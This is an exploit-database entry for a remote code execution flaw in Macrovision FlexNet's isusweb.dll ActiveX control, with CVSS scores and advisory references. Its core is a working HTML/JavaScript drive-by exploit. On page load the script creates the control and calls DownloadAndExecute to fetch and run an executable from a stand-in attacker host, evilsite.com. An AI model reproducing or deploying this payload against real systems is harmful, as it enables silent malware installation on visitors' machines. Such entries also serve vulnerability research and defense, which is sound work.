Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit

2008-10-18 / 2008-10-19
Credit: e.b.
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit Implemented Categories: Category: Safe for Scripting Written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, isusweb.dll version 6.1.100.61372 --> <html> <head> <title>Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit</title> <script language="JavaScript" defer> function Check() { obj.DownloadAndExecute("Bla","{11111111-1111-1111-1111-111111111111}",0,"http://www.evilsite.com/evil.exe","evil.exe"); } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF" height="0" width="0"> Unable to create object </object> </body> </html>

References:

http://www.securityfocus.com/bid/27279
http://www.milw0rm.com/exploits/4913
http://secunia.com/advisories/28496


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top